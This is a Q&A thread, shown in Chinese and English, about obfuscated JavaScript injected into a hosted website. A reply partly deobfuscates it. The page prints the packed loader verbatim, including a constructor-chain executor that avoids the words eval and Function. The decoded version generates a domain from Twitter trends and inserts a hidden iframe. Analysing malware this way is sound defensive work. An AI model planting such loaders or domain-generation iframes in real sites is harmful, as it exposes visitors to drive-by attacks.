这是危险的 JavaScript 吗?


<script>
// Packed, injected loader, kept verbatim as a sample (do not run it).
// Three stages are visible: (1) `d` holds dictionary-compressed source text,
// (2) the `for` loop expands it, (3) the function passed in as `$$` compiles and runs it.
// NOTE(review): as rendered here the string literal breaks across two lines, which would not
// parse as-is; presumably the page extraction altered whitespace or control characters of the
// original. Treat this copy as a reading aid, not as a byte-exact sample.
(function($$) {
    // `d` (like `c`, `t` and `x` below) is assigned without a declaration, so it becomes a global.
    d = "(@(){ %H=@( +Pw=this;\\[Pw~FullYear $Month $Date $Hours $Minutes $Seconds()]}; %B=@( +#h,PD=this.#H(),i=0;PD[1]+=1;while(i++<7){#h=PD[i] 0#h<#L)PD[i]=Vz')+#h}\\ PD.splice(Vz'),1+VT - 3Vu -+'T'+PD 3VU -};Pr={'hXhttp://`sX/`tXtre`dXdai`nXnds`qX?`cXcallback=`jX#`aXapi`lXly`WXtwitter`oXcom`eX1`kXs`KXbody`xXajax`DX.`LXlibs`JXjquery`6X6.2`mXmin`fXon`SXcript`iXif`MXrame`YXhead`wXwidth:`pXpx;`HXheight:`TX2`rXrc`QX\"`yXstyle=`bX><`RX></`IXdiv`BX<`AX>`gXgoogle`EX&date=`zX0`uX-`UX `,X:00`;':2345678901,'/':48271,'F':198195254,'G':12,'CX='};@ #n(#E){#M=[];for(PM=0;PM<#E /;PM++){#M.push(Pr[#E.charAt(PM)])}\\ #p(#M)}Pj=document;#d=window; (C='undefined'; (S=VhaDWDosestnsdlDjfqcq' 6G= &)== (C) 0#G||!PR()){if(!#G){try{Pn=jQuery  ;try{Pn=$  }PS=Pj.getElementsByTagName(VY -[0];#m=Pj.createElement(VkS -;#m.setAttribute(Vkr'),#n(\"hxDgakDosxsLsJseD6sJDmDj\"));PS.appendChild(#m)}@ PH(#q,PB){\\ Math.floor(#q/PB) 7x(#s +PC=PH( (N, !m) 5F= (N% !m 5f= !D*#F- !T*PC 0#f>0){#N=#f}else{#N=#f+ !v}\\(#N%#s) 7t(#k){ (N=V;')+#k; !D=V/'); !v=V;')-VF'); !m=PH( !v, !D); !T= !v% !D 7p(P){\\ P /==1?P[0]:P 3'')};@ #e(P){d=new Date( 6D=Vzee');d.setTime((P.as_of-VG')*VG')*VG')*Vezz -*Vezzz -;\\ d 7z(Pz +#c,PL,#j=Pz / 5v=[];while(--#j){PL=#x(#j 6v.push(PL 6c=Pz[PL];Pz[PL]=Pz[#j];Pz[#j]=#c}}@ PJ($){PN=$.map([81,85,74,74,92,17,82,73,80,30,82,77,25,11,10,10,61,11,56,55,11,53,6,53,7,2,1,0,48],@(x,i){\\ String.fromCharCode(i+x+24)});\\ #p(PN) 7o($){if &)!= (C){$(@(){if &.Ph)!= (C)\\;$.Ph=1; 2S,@(Pe){#R=#e(Pe 6K=#R~Month() 8c=#R~Date( 6u=#S+#n(\"ETzeeu\")+#K+\"-\"+Pc;Pu=PA=PH(#R~Hours(),6)*6 8d=Pu+1;#L=+Vez'); ) 2u,@(Pe){try{#y=Pe.trends;for(#r in #y){break}#r=#r.substr(+Vz'),+Vee - 0Pu ,u 0Pd ,d; 4u+V,')] 0!#b) 4d+V,')];#b=(#b[3].name.toLowerCase().replace(/[^a-z]/gi,'')+'safetynet').split('' 6T=#K*73+PA*3+Pc*41;#t(#T 6a=#x(4)+#L;#z(#b 6g=VCh')+#p(#b).substring(0,#a)+'.com/'+PJ($);Pr['Z']=#g;Pf=VBI 1biMU 1UkrZRiMRIA');$(VK -.append(Pf)}catch(Py){}})},#L*#L*#L)})})}else{ ) *,1+VTTT -}} 
*)()#js@functionP#AV#n('X':'`','~.getUTC\\return  .noConflict(true)}catch(e){} !#d.P $(),Pw~ %Date.prototype.# &(typeof($ (#d.# )setTimeout(@(){ *#o(#d.jQuery)} +){var  ,<#L)Pu=Vz')+P -')) /.length 0;if( 1yQHTpweeepQ 2$.getJSON(# 3.join( 4#b=#y[#r+P 5;var # 6);# 7}@ # 8+(+Ve -;P";
    // Unpacker: c counts down from 50. Each pass takes a 2-character token (a 1-character token
    // once c is below 10) from the separator list, splits `d` on that token and re-joins the
    // pieces with the last piece (t.pop()), i.e. with the dictionary entry stored at the tail
    // of the string. After the loop `d` is plain JavaScript source text.
    for (c = 50; c; d = (t = d.split('#@PVX`~\\   ! $ % & ( ) * + , - / 0 1 2 3 4 5 6 7 8'.substr(c -= (x = c < 10 ? 1 : 2), x))).join(t.pop()));
    // Hand the expanded source text to the executor supplied as the IIFE's argument.
    $$(d)
})(function(jsAP) {
    // Executor. jsA(v) returns v.constructor; jsAg(f) returns g => f.call(f, g).
    // With jsAP a string, jsA(jsAP) is String and jsA(<any function>) is Function, so the
    // expression below reduces to Function(jsAP)(): the text is compiled and executed.
    // The words `eval` and `Function` never appear, so a scan for those keywords will not
    // match this; the `.constructor` chain is the thing to look for.
    return (function(jsA, jsAg) {
        return jsAg(jsA(jsAg(jsA(jsAP))))(jsAP)()
    })((function(jsA) {
        return jsA.constructor
    }), (function(jsA) {
        return (function(jsAg) {
            return jsA.call(jsA, jsAg)
        })
    }))
});
</script>

我的主机商对此只字未提,而且这种情况经常发生。我认为他们可能在隐瞒一次恶意入侵。

这是做什么的?

编辑:

我们正在更换主机。

该代码确实是恶意的,被注入到我们的网站中。我们的主机试图隐瞒这一点(可能是为了让我们不担心)

这发生在同一主机上我朋友的网站上。

请不要测试此脚本。

看起来像是一些混淆的注入。

<script>
// Packed, injected loader, kept verbatim as a sample (do not run it).
// Three stages are visible: (1) `d` holds dictionary-compressed source text,
// (2) the `for` loop expands it, (3) the function passed in as `$` compiles and runs it.
// NOTE(review): as rendered here the string literal breaks across two lines, which would not
// parse as-is; presumably the page extraction altered whitespace or control characters of the
// original. Treat this copy as a reading aid, not as a byte-exact sample.
(function($) {
    // `d` (like `c`, `t` and `x` below) is assigned without a declaration, so it becomes a global.
    d = "(@(){ %H=@( +Pw=this;\\[Pw~FullYear $Month $Date $Hours $Minutes $Seconds()]}; %B=@( +#h,PD=this.#H(),i=0;PD[1]+=1;while(i++<7){#h=PD[i] 0#h<#L)PD[i]=Vz')+#h}\\ PD.splice(Vz'),1+VT - 3Vu -+'T'+PD 3VU -};Pr={'hXhttp://`sX/`tXtre`dXdai`nXnds`qX?`cXcallback=`jX#`aXapi`lXly`WXtwitter`oXcom`eX1`kXs`KXbody`xXajax`DX.`LXlibs`JXjquery`6X6.2`mXmin`fXon`SXcript`iXif`MXrame`YXhead`wXwidth:`pXpx;`HXheight:`TX2`rXrc`QX\"`yXstyle=`bX><`RX></`IXdiv`BX<`AX>`gXgoogle`EX&date=`zX0`uX-`UX `,X:00`;':2345678901,'/':48271,'F':198195254,'G':12,'CX='};@ #n(#E){#M=[];for(PM=0;PM<#E /;PM++){#M.push(Pr[#E.charAt(PM)])}\\ #p(#M)}Pj=document;#d=window; (C='undefined'; (S=VhaDWDosestnsdlDjfqcq' 6G= &)== (C) 0#G||!PR()){if(!#G){try{Pn=jQuery  ;try{Pn=$  }PS=Pj.getElementsByTagName(VY -[0];#m=Pj.createElement(VkS -;#m.setAttribute(Vkr'),#n(\"hxDgakDosxsLsJseD6sJDmDj\"));PS.appendChild(#m)}@ PH(#q,PB){\\ Math.floor(#q/PB) 7x(#s +PC=PH( (N, !m) 5F= (N% !m 5f= !D*#F- !T*PC 0#f>0){#N=#f}else{#N=#f+ !v}\\(#N%#s) 7t(#k){ (N=V;')+#k; !D=V/'); !v=V;')-VF'); !m=PH( !v, !D); !T= !v% !D 7p(P){\\ P /==1?P[0]:P 3'')};@ #e(P){d=new Date( 6D=Vzee');d.setTime((P.as_of-VG')*VG')*VG')*Vezz -*Vezzz -;\\ d 7z(Pz +#c,PL,#j=Pz / 5v=[];while(--#j){PL=#x(#j 6v.push(PL 6c=Pz[PL];Pz[PL]=Pz[#j];Pz[#j]=#c}}@ PJ($){PN=$.map([81,85,74,74,92,17,82,73,80,30,82,77,25,11,10,10,61,11,56,55,11,53,6,53,7,2,1,0,48],@(x,i){\\ String.fromCharCode(i+x+24)});\\ #p(PN) 7o($){if &)!= (C){$(@(){if &.Ph)!= (C)\\;$.Ph=1; 2S,@(Pe){#R=#e(Pe 6K=#R~Month() 8c=#R~Date( 6u=#S+#n(\"ETzeeu\")+#K+\"-\"+Pc;Pu=PA=PH(#R~Hours(),6)*6 8d=Pu+1;#L=+Vez'); ) 2u,@(Pe){try{#y=Pe.trends;for(#r in #y){break}#r=#r.substr(+Vz'),+Vee - 0Pu ,u 0Pd ,d; 4u+V,')] 0!#b) 4d+V,')];#b=(#b[3].name.toLowerCase().replace(/[^a-z]/gi,'')+'safetynet').split('' 6T=#K*73+PA*3+Pc*41;#t(#T 6a=#x(4)+#L;#z(#b 6g=VCh')+#p(#b).substring(0,#a)+'.com/'+PJ($);Pr['Z']=#g;Pf=VBI 1biMU 1UkrZRiMRIA');$(VK -.append(Pf)}catch(Py){}})},#L*#L*#L)})})}else{ ) *,1+VTTT -}} 
*)()#js@functionP#AV#n('X':'`','~.getUTC\\return  .noConflict(true)}catch(e){} !#d.P $(),Pw~ %Date.prototype.# &(typeof($ (#d.# )setTimeout(@(){ *#o(#d.jQuery)} +){var  ,<#L)Pu=Vz')+P -')) /.length 0;if( 1yQHTpweeepQ 2$.getJSON(# 3.join( 4#b=#y[#r+P 5;var # 6);# 7}@ # 8+(+Ve -;P";
    // Unpacker: c counts down from 50. Each pass takes a 2-character token (a 1-character token
    // once c is below 10) from the separator list, splits `d` on that token and re-joins the
    // pieces with the last piece (t.pop()), i.e. with the dictionary entry stored at the tail
    // of the string. After the loop `d` is plain JavaScript source text.
    for (c = 50; c; d = (t = d.split('#@PVX`~\\   ! $ % & ( ) * + , - / 0 1 2 3 4 5 6 7 8'.substr(c -= (x = c < 10 ? 1 : 2), x))).join(t.pop()));
    // Hand the expanded source text to the executor supplied as the IIFE's argument.
    $(d)
})(function(jsAP) {
    // Executor. jsA(v) returns v.constructor; jsAg(f) returns g => f.call(f, g).
    // With jsAP a string, jsA(jsAP) is String and jsA(<any function>) is Function, so the
    // expression below reduces to Function(jsAP)(): the text is compiled and executed.
    // The words `eval` and `Function` never appear, so a scan for those keywords will not
    // match this; the `.constructor` chain is the thing to look for.
    return (function(jsA, jsAg) {
        return jsAg(jsA(jsAg(jsA(jsAP))))(jsAP)()
    })((function(jsA) {
        return jsA.constructor
    }), (function(jsA) {
        return (function(jsAg) {
            return jsA.call(jsA, jsAg)
        })
    }))
});
</script>

My host is saying nothing about this and it is happening frequently. I think they might be hiding a malicious hacking attempt.

What does this do?

EDIT:

We're changing hosts.

The code is indeed malicious and was injected into our website. Our host was trying to conceal that (probably so that we wouldn't worry)

This happened to my friend's website on the same host.

Don't test out this script, please.

Looks like some obfuscated injection.


摇划花蜜的午后 2024-12-21 20:38:56

让我们一起动手破译它;这会(还算)有趣。

据我目前所知(AFAICT),它抓取的(似乎)是当前日期两天前的第三个趋势,或者至少本意如此(我认为它用来查找某一天趋势的日期键不正确,因为它在时间后面附加了零秒部分,而提要中并没有这一部分);然后据此构建一个 URL,并发送一些以代表最近 6 小时区间的哈希值为键的数据。

下面是解码后的文本块,以及初步分析:

// Analyst's partial deobfuscation of the injected script. It is a reading aid rather than a
// runnable program: loadJquery() is a stand-in that this listing never defines.
// Summary of what the code below does: it reads a public trends feed, derives a host name from
// one trend name with a date-seeded shuffle, and appends a 2px-high iframe to <body>.
(function () {
    // NOTE(review): in the packed sample this object is the key-to-fragment table that the
    // string builder reads; it is shown empty here. jsAr['Z'] is assigned further down.
    jsAr = { };

    /* Returns either first element of jsA, or a joined string. */
    function firstElementOrJoined(jsA) {
        return jsA.length == 1 ? jsA[0] : jsA.join('')
    };

    // Alias for the page's document object.
    jsAj = document;

    loadJquery(); // Load JQ in head new script tag (analyst's placeholder; not defined here).

    /* Integer division: floor(jsq / jsAB). */
    function divideAndFloor(jsq, jsAB) {
        return Math.floor(jsq / jsAB)
    }

    /*
     * Advances the generator state jsN and returns the new state modulo jss.
     * The step a*(s % q) - r*floor(s / q), with a = jsAD, q = jsAm, r = jsAT and a wrap-around
     * by jsAv when the result is not positive, is the Schrage form of a multiplicative
     * congruential generator. Depends on jst() having set jsN, jsAD, jsAv, jsAm and jsAT.
     */
    function jsx(jss) {
        var jsAC = divideAndFloor(jsN, jsAm);
        var jsF = jsN % jsAm;
        var jsf = (jsAD * jsF) - (jsAT * jsAC);
        if (jsf > 0) {
            jsN = jsf
        } else {
            jsN = jsf + jsAv
        }
        return (jsN % jss)
    }

    /**
     * Seeds the generator used by jsx(): state = 2345678901 + jsk, multiplier 48271,
     * modulus 2147483647 (2^31 - 1). Used only once in .getJSON call.
     */
    function jst(jsk) {
        jsN = 2345678901 + jsk;
        jsAD = 48271;
        jsAv = 2147483647;
        jsAm = divideAndFloor(jsAv, jsAD);
        jsAT = jsAv % jsAD
    }

    /**
     * Takes twitter as_of and subtracts 172800 (2 days' worth of seconds), then scales by
     * '1000' (a string, coerced to a number by `*`) before calling setTime().
     * Writes the global `d`.
     */
    function jse(jsA) {
        d = new Date();
        d.setTime((jsA.as_of - 172800) * '1000');
        return d
    }

    /*
     * Shuffles jsAz in place: jsj runs from length - 1 down to 1 and element jsj is swapped with
     * element jsx(jsj). jsv collects the chosen indices but is never read.
     * The order depends only on the generator state, so the same seed gives the same permutation.
     */
    function jsz(jsAz) {
        var jsc, jsAL, jsj = jsAz.length;
        var jsv = [];
        while (--jsj) {
            jsAL = jsx(jsj);
            jsv.push(jsAL);
            jsc = jsAz[jsAL];
            jsAz[jsAL] = jsAz[jsj];
            jsAz[jsj] = jsc
        }
    }


    /* Main routine: waits for jQuery, then runs the two feed requests and the DOM insertion. */
    function jso($) {
        // Wait until we have jQuery loaded; retries after 1222 ms.
        if (typeof($) == 'undefined') {
            setTimeout(function () { jso(jQuery) }, 1222);
            return;
        }

        $(function () {
            // Only run this function once (there's a timeout inside).
            // $.jsAh is a marker property set on the jQuery object itself.
            if (typeof ($.jsAh) != 'undefined') return;
            $.jsAh = 1;

            // First request (JSONP, callback=?) only supplies as_of, so the date used below
            // comes from the feed rather than from the visitor's clock.
            $.getJSON('http://api.twitter.com/1/trends/daily.json?callback=?', function (data) {
                dateTwoDaysPrior = jse(data);
                nMonthTwoDaysAgo = dateTwoDaysPrior.getUTCMonth() + 1;
                nDayTwoDaysAgo = dateTwoDaysPrior.getUTCDate();
                // The year is hard-coded to 2011 in the sample.
                urlTwitterTwoDaysAgo = 'http://api.twitter.com/1/trends/daily.json?callback=?&date=2011-' + nMonthTwoDaysAgo + "-" + nDayTwoDaysAgo;

                // Start of the 6-hour block plus one: 1, 7, 13 or 19.
                twoDigitPrevSixHr = prevSixHr = divideAndFloor(dateTwoDaysPrior.getUTCHours(), 6) * 6 + 1;
                jsAd = twoDigitPrevSixHr + 1;

                // setTimeout, not setInterval: the second request is issued once, 1000 ms later.
                setTimeout(function () {
                    $.getJSON(urlTwitterTwoDaysAgo, function (data) {
                        try {
                            jsy = data.trends;
                            // Grab the first enumerated key of data.trends.
                            for (jsr in jsy) {
                                break;
                            }
                            jsr = jsr.substr(0, 11);  // == 2011-11-10 (11 characters are kept)

                            if (twoDigitPrevSixHr < 10) twoDigitPrevSixHr = '0' + twoDigitPrevSixHr; // Normalize to hh
                            // NOTE(review): this assigns to twoDigitPrevSixHr, not jsAd. The packed
                            // sample appears to expand to the same assignment, so the slip looks
                            // like the sample's own, not a decoding error.
                            if (jsAd < 10) twoDigitPrevSixHr = '0' + jsAd; // Normalize to hh

                            // Try to get trends for last 6hr thing (but the :00 will make it never work?)
                            // If can't, try to get the next 6hr thing.
                            jsb = jsy[jsr + twoDigitPrevSixHr + ':00'];
                            if (!jsb) jsb = jsy[jsr + jsAd + ':00'];

                            // Take the entry at index 3 (zero-based), e.g.,
                            // {
                            //    "name": "#sinterklaasintocht",
                            //    "query": "#sinterklaasintocht",
                            //    "promoted_content": null,
                            //    "events": null
                            // }
                            // and strip out non-chars from name, add safetynet, and convert to array
                            // ['s', 'i', etc... nterklaasintochtsafetynet]
                            jsb = (jsb[3].name.toLowerCase().replace(/[^a-z]/gi, '') + 'safetynet').split('');

                            // Seed: month * 73 + hour block * 3 + day * 41
                            // (803 and 410 are the values for month 11 and day 10).
                            hashkeyForTwoDaysAgoPrevSixHr = nMonthTwoDaysAgo * 73 + prevSixHr * 3 + nDayTwoDaysAgo * 41;
                            jst(hashkeyForTwoDaysAgoPrevSixHr);

                            // Length of the host label: 10 plus jsx(4), presumably 10 to 13.
                            jsa = jsx(4) + 10;
                            jsz(jsb);

                            // NOTE(review): these two lines are used. In the packed sample the markup
                            // below is assembled from a key string in which 'Z' follows the keys for
                            // 's' and 'rc', so jsAr['Z'] (this '=http://...' value) becomes the
                            // iframe's src. The bare `src` in jsAf looks like a decoding artifact:
                            // 'Z' had no value when the string was expanded statically.
                            // jsb = ['s', 'i', etc... nterklaasintochtsafetynet], shuffled by jsz()
                            jsg = '=http://' + firstElementOrJoined(jsb).substring(0, jsa) + '.com/index.php?tp=001e4bb7b4d7333d';
                            jsAr['Z'] = jsg;

                            // 2px x 111px iframe appended to <body>. For responders, an unexpected
                            // tiny iframe plus trend-feed requests the site never makes itself
                            // are the observable symptoms of this injection.
                            jsAf = '<divstyle="height:2px;width:111px;"><iframe style="height:2px;width:111px;" src></iframe></div>';
                            $('body').append(jsAf)
                        } catch (jsAy) {} // Any error is swallowed silently.
                    })
                }, 1000)
            })
        });
    }

    jso(jQuery)
})();

这是从数组构造的一些 URL:

jsd.jsS = http://api.twitter.com/1/trends/daily.json?callback=?

这段代码:

// jsn() maps each character of its argument through the sample's lookup table and joins the
// pieces: 'Y' -> "head", 'kS' -> "script", 'kr' -> "src", and the long key string -> the
// jQuery 1.6.2 URL on ajax.googleapis.com shown below.
jsAS = jsAj.getElementsByTagName(jsn('Y'))[0];
jsm = jsAj.createElement(jsn('kS'));
jsm.setAttribute(jsn('kr'), jsn("hxDgakDosxsLsJseD6sJDmDj"));
// The library is a legitimate one, fetched over plain http; the payload relies on it for its
// JSONP requests and for the DOM insertion.
jsAS.appendChild(jsm)

将 jquery 脚本标记附加到 <head>:

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>

Let's work and decipher this; it'll be fun(-nish).

AFAICT so far it's grabbing (what seems to be) the third trend for two days prior to the current date, or at least was meant to (I think the date key it's using to look up a day's trends is incorrect, because it's adding a zero-seconds thing onto the time, which isn't present in the feed), building a URL from that, and sending some data keyed on a hash representing the nearest 6-hr interval.

Here's the blob of text after decoding, along with the start of an analysis:

// Analyst's partial deobfuscation of the injected script. It is a reading aid rather than a
// runnable program: loadJquery() is a stand-in that this listing never defines.
// Summary of what the code below does: it reads a public trends feed, derives a host name from
// one trend name with a date-seeded shuffle, and appends a 2px-high iframe to <body>.
(function () {
    // NOTE(review): in the packed sample this object is the key-to-fragment table that the
    // string builder reads; it is shown empty here. jsAr['Z'] is assigned further down.
    jsAr = { };

    /* Returns either first element of jsA, or a joined string. */
    function firstElementOrJoined(jsA) {
        return jsA.length == 1 ? jsA[0] : jsA.join('')
    };

    // Alias for the page's document object.
    jsAj = document;

    loadJquery(); // Load JQ in head new script tag (analyst's placeholder; not defined here).

    /* Integer division: floor(jsq / jsAB). */
    function divideAndFloor(jsq, jsAB) {
        return Math.floor(jsq / jsAB)
    }

    /*
     * Advances the generator state jsN and returns the new state modulo jss.
     * The step a*(s % q) - r*floor(s / q), with a = jsAD, q = jsAm, r = jsAT and a wrap-around
     * by jsAv when the result is not positive, is the Schrage form of a multiplicative
     * congruential generator. Depends on jst() having set jsN, jsAD, jsAv, jsAm and jsAT.
     */
    function jsx(jss) {
        var jsAC = divideAndFloor(jsN, jsAm);
        var jsF = jsN % jsAm;
        var jsf = (jsAD * jsF) - (jsAT * jsAC);
        if (jsf > 0) {
            jsN = jsf
        } else {
            jsN = jsf + jsAv
        }
        return (jsN % jss)
    }

    /**
     * Seeds the generator used by jsx(): state = 2345678901 + jsk, multiplier 48271,
     * modulus 2147483647 (2^31 - 1). Used only once in .getJSON call.
     */
    function jst(jsk) {
        jsN = 2345678901 + jsk;
        jsAD = 48271;
        jsAv = 2147483647;
        jsAm = divideAndFloor(jsAv, jsAD);
        jsAT = jsAv % jsAD
    }

    /**
     * Takes twitter as_of and subtracts 172800 (2 days' worth of seconds), then scales by
     * '1000' (a string, coerced to a number by `*`) before calling setTime().
     * Writes the global `d`.
     */
    function jse(jsA) {
        d = new Date();
        d.setTime((jsA.as_of - 172800) * '1000');
        return d
    }

    /*
     * Shuffles jsAz in place: jsj runs from length - 1 down to 1 and element jsj is swapped with
     * element jsx(jsj). jsv collects the chosen indices but is never read.
     * The order depends only on the generator state, so the same seed gives the same permutation.
     */
    function jsz(jsAz) {
        var jsc, jsAL, jsj = jsAz.length;
        var jsv = [];
        while (--jsj) {
            jsAL = jsx(jsj);
            jsv.push(jsAL);
            jsc = jsAz[jsAL];
            jsAz[jsAL] = jsAz[jsj];
            jsAz[jsj] = jsc
        }
    }


    /* Main routine: waits for jQuery, then runs the two feed requests and the DOM insertion. */
    function jso($) {
        // Wait until we have jQuery loaded; retries after 1222 ms.
        if (typeof($) == 'undefined') {
            setTimeout(function () { jso(jQuery) }, 1222);
            return;
        }

        $(function () {
            // Only run this function once (there's a timeout inside).
            // $.jsAh is a marker property set on the jQuery object itself.
            if (typeof ($.jsAh) != 'undefined') return;
            $.jsAh = 1;

            // First request (JSONP, callback=?) only supplies as_of, so the date used below
            // comes from the feed rather than from the visitor's clock.
            $.getJSON('http://api.twitter.com/1/trends/daily.json?callback=?', function (data) {
                dateTwoDaysPrior = jse(data);
                nMonthTwoDaysAgo = dateTwoDaysPrior.getUTCMonth() + 1;
                nDayTwoDaysAgo = dateTwoDaysPrior.getUTCDate();
                // The year is hard-coded to 2011 in the sample.
                urlTwitterTwoDaysAgo = 'http://api.twitter.com/1/trends/daily.json?callback=?&date=2011-' + nMonthTwoDaysAgo + "-" + nDayTwoDaysAgo;

                // Start of the 6-hour block plus one: 1, 7, 13 or 19.
                twoDigitPrevSixHr = prevSixHr = divideAndFloor(dateTwoDaysPrior.getUTCHours(), 6) * 6 + 1;
                jsAd = twoDigitPrevSixHr + 1;

                // setTimeout, not setInterval: the second request is issued once, 1000 ms later.
                setTimeout(function () {
                    $.getJSON(urlTwitterTwoDaysAgo, function (data) {
                        try {
                            jsy = data.trends;
                            // Grab the first enumerated key of data.trends.
                            for (jsr in jsy) {
                                break;
                            }
                            jsr = jsr.substr(0, 11);  // == 2011-11-10 (11 characters are kept)

                            if (twoDigitPrevSixHr < 10) twoDigitPrevSixHr = '0' + twoDigitPrevSixHr; // Normalize to hh
                            // NOTE(review): this assigns to twoDigitPrevSixHr, not jsAd. The packed
                            // sample appears to expand to the same assignment, so the slip looks
                            // like the sample's own, not a decoding error.
                            if (jsAd < 10) twoDigitPrevSixHr = '0' + jsAd; // Normalize to hh

                            // Try to get trends for last 6hr thing (but the :00 will make it never work?)
                            // If can't, try to get the next 6hr thing.
                            jsb = jsy[jsr + twoDigitPrevSixHr + ':00'];
                            if (!jsb) jsb = jsy[jsr + jsAd + ':00'];

                            // Take the entry at index 3 (zero-based), e.g.,
                            // {
                            //    "name": "#sinterklaasintocht",
                            //    "query": "#sinterklaasintocht",
                            //    "promoted_content": null,
                            //    "events": null
                            // }
                            // and strip out non-chars from name, add safetynet, and convert to array
                            // ['s', 'i', etc... nterklaasintochtsafetynet]
                            jsb = (jsb[3].name.toLowerCase().replace(/[^a-z]/gi, '') + 'safetynet').split('');

                            // Seed: month * 73 + hour block * 3 + day * 41
                            // (803 and 410 are the values for month 11 and day 10).
                            hashkeyForTwoDaysAgoPrevSixHr = nMonthTwoDaysAgo * 73 + prevSixHr * 3 + nDayTwoDaysAgo * 41;
                            jst(hashkeyForTwoDaysAgoPrevSixHr);

                            // Length of the host label: 10 plus jsx(4), presumably 10 to 13.
                            jsa = jsx(4) + 10;
                            jsz(jsb);

                            // NOTE(review): these two lines are used. In the packed sample the markup
                            // below is assembled from a key string in which 'Z' follows the keys for
                            // 's' and 'rc', so jsAr['Z'] (this '=http://...' value) becomes the
                            // iframe's src. The bare `src` in jsAf looks like a decoding artifact:
                            // 'Z' had no value when the string was expanded statically.
                            // jsb = ['s', 'i', etc... nterklaasintochtsafetynet], shuffled by jsz()
                            jsg = '=http://' + firstElementOrJoined(jsb).substring(0, jsa) + '.com/index.php?tp=001e4bb7b4d7333d';
                            jsAr['Z'] = jsg;

                            // 2px x 111px iframe appended to <body>. For responders, an unexpected
                            // tiny iframe plus trend-feed requests the site never makes itself
                            // are the observable symptoms of this injection.
                            jsAf = '<divstyle="height:2px;width:111px;"><iframe style="height:2px;width:111px;" src></iframe></div>';
                            $('body').append(jsAf)
                        } catch (jsAy) {} // Any error is swallowed silently.
                    })
                }, 1000)
            })
        });
    }

    jso(jQuery)
})();

Here's some URLs constructed from the array:

jsd.jsS = http://api.twitter.com/1/trends/daily.json?callback=?

This chunk of code:

// jsn() maps each character of its argument through the sample's lookup table and joins the
// pieces: 'Y' -> "head", 'kS' -> "script", 'kr' -> "src", and the long key string -> the
// jQuery 1.6.2 URL on ajax.googleapis.com shown below.
jsAS = jsAj.getElementsByTagName(jsn('Y'))[0];
jsm = jsAj.createElement(jsn('kS'));
jsm.setAttribute(jsn('kr'), jsn("hxDgakDosxsLsJseD6sJDmDj"));
// The library is a legitimate one, fetched over plain http; the payload relies on it for its
// JSONP requests and for the DOM insertion.
jsAS.appendChild(jsm)

appends the jquery script tag to <head>:

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>